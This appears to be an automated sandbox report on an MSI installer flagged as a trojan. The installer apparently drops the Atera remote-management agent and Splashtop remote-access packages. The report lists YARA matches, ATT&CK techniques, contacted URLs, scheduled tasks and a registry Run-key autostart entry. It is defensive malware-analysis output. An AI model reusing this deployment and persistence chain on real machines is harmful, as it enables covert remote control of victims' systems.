Source: Yara match, File source: C:\Windows\Temp\~DF6770E5F65DEE8E27.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF8959754CB5C77D85.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF98A3B0A404DB694E.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF45939A071886D6FE.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF48BCAB6E3000FF9C.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF4BDFDDF68F93C3AD.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF38B1B8C320DF517A.TMP, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF6B3BD24D01329A5D.TMP, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | 1 Scripting | 1 Replication Through Removable Media | 541 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 3 Native API | 1 DLL Side-Loading | 31 Windows Service | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Input Capture | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 31 Windows Service | 121 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Software Packing | NTDS | 167 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
                                Gather Victim Network InformationServerCloud Accounts11
                                Service Execution
                                1
                                Registry Run Keys / Startup Folder
                                1
                                Registry Run Keys / Startup Folder
                                1
                                Timestomp
                                LSA Secrets1
                                Query Registry
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading
                                Cached Domain Credentials671
                                Security Software Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                File Deletion
                                DCSync361
                                Virtualization/Sandbox Evasion
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job123
                                Masquerading
                                Proc Filesystem2
                                Process Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Modify Registry
                                /etc/passwd and /etc/shadow11
                                Application Window Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron361
                                Virtualization/Sandbox Evasion
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd121
                                Process Injection
                                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                Rundll32
                                KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
[Behavior graph: ID 1545758, sample Arquivo_4593167.msi, start date 30/10/2024, architecture WINDOWS, score 100. Legend: process, signature, created file, DNS/IP info.]

Source | Detection | Scanner | Label | Link
Arquivo_4593167.msi | 24% | ReversingLabs | Win32.Trojan.Atera |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | 21% | ReversingLabs | Win32.Trojan.Atera |
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://repository.swisssign.com/0 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe |
http://www.symauth.com/cps0( | 0% | URL Reputation | safe |
http://www.symauth.com/rpa00 | 0% | URL Reputation | safe |
https://www.newtonsoft.com/jsonschema | 0% | URL Reputation | safe |
                                No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                          unknown
                                                                          http://schemas.datacontract.org/2004/07/System.ServiceProcessAteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.40/AgentPackageMonitoring.zAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://my.splashtop.com/csrs/winAgentPackageSTRemote.exe, 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=00370d56-8b21-43a9-8b87-a8ec77571e56AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://wixtoolset.orgrundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msifalse
                                                                                    unknown
                                                                                    http://www.disig.sk/ca/crl/ca_disig.crl0AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://agent-api.atera.com/ProductionAgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://agent-api.atera.com/Production/Agent/track-event;rundll32.exe, 00000004.00000002.1732615847.00000000049E6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstallerAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://acontrol.atera.com/AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://agent-api.atera.com/Production/Agent/dynamic-fields/AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://agent-api.atera.com/Production/Agent/AgentStarting)AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/37.9/AgentPackageAgentInformationAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://ps.pndsn.comAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1467000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D0E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CC3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://github.com/mono/linker/pull/649System.Private.CoreLib.dll.1.drfalse
                                                                                                        unknown
                                                                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziphAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14D5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/bc2f6fef-7e04-492a-b3cbAteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1695000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscoveAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://ps.atera.comAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://nlog-project.org/ws/3NLog.dll.24.drfalse
                                                                                                                      unknown
                                                                                                                      https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bfbcf15-78c5-42b3-a888-e57cf083e16dAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://nlog-project.org/ws/5NLog.dll.24.drfalse
                                                                                                                          unknown
                                                                                                                          https://agent-api.atera.com/Production/Agent/GetRecurringPackagesseTasHAteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://a6dc35606b2c6816e.awsglobalaccelerator.comAgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://agent-api.atera.comrundll32.exe, 00000004.00000002.1732615847.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046B5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62D0F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CFA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://my.splashtop.comAgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://github.com/dotnet/runtimewSystem.Threading.Tasks.Dataflow.dll.1.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://agent-api.atera.com/Production/Agent/GetRecurrinAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://agent-api.atera.com/Production/Agent/dynamic-fields/script-basedAgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://schemas.datacontract.org/2004/07/AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, System.Private.DataContractSerialization.dll.1.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://github.com/icsharpcode/SharpZipLibAteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscoveryAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentIAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://schemas.datacontract.org/2004/07/System.Runtime.SerializationSystem.Private.DataContractSerialization.dll.1.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://aka.ms/dotnet-illink/comSystem.Private.CoreLib.dll.1.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziphAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgeAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://download.splashtop.comAgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/25.8/AgentPackageProgramManageAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.symauth.com/cps0(xdnup.dll.1.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=e67ebcbd-5956-47bb-95bb-73cf0832e6deAteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/37.9/AGENTPACKAGEAGENTINFORMATIAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.certplus.com/CRL/class3TS.crl0AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9CC6000.00000004.00000020.00020000.00000000.sdmpfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545758
Start date and time: 2024-10-30 23:29:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 70
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Arquivo_4593167.msi
Detection: MAL
Classification: mal100.troj.spyw.evad.winMSI@188/1121@0/8
EGA Information:
• Successful, ratio: 28.6%
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 381
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .msi
• Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe
• Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 2916 because it is empty
• Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 2932 because it is empty
• Execution Graph export aborted for target AgentPackageSTRemote.exe, PID 1016 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target AteraAgent.exe, PID 1852 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target AteraAgent.exe, PID 2640 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target AteraAgent.exe, PID 6200 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target rundll32.exe, PID 2084 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target rundll32.exe, PID 2256 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target rundll32.exe, PID 3320 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target rundll32.exe, PID 5780 because it is empty
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                            • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                            • VT rate limit hit for: Arquivo_4593167.msi
Time | Type | Description
18:30:02 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
18:30:06 | API Interceptor | 252870x Sleep call for process: AteraAgent.exe modified
18:30:25 | API Interceptor | 48x Sleep call for process: AgentPackageAgentInformation.exe modified
18:30:32 | API Interceptor | 556x Sleep call for process: AgentPackageSTRemote.exe modified
18:30:54 | API Interceptor | 2x Sleep call for process: msiexec.exe modified
22:31:04 | Task Scheduler | Run new task: Monitoring Recovery path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe s>schedulerrun
22:31:27 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {96ec02bb-b5fa-4892-a305-c6128466beda} "C:\ProgramData\Package Cache\{96ec02bb-b5fa-4892-a305-c6128466beda}\dotnet-runtime-6.0.35-win-x64.exe" /burn.runonce
22:31:53 | Task Scheduler | Run new task: AteraAgentServiceWatchdog path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe s>eyJBZ2VudElkIjoiYmMyZjZmZWYtN2UwNC00OTJhLWIzY2ItMWMwM2NiMGRmNWIyIiwiQ29tbWFuZElkIjoiNGViOGIzYWUtM2ExZS00YzdiLWE3ZjMtODg0ZGIyNzIxODk4IiwiQWNjb3VudElkIjoiMDAxUTMwMDAwMExsa3htSUFCIiwiQWdlbnRBcGlIb3N0IjoiYWdlbnQtYXBpLmF0ZXJhLmNvbS9Qcm9kdWN0aW9uIiwiQXJndW1lbnRzIjoie1x1MDAyMkNvbW1hbmROYW1lXHUwMDIyOlx1MDAyMmhlYWx0aGNoZWNrXHUwMDIyfSIsIkFnZW50RGlyZWN0b3J5IjoiIn0=
                                                                                                                                                                                                                                                                                          https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
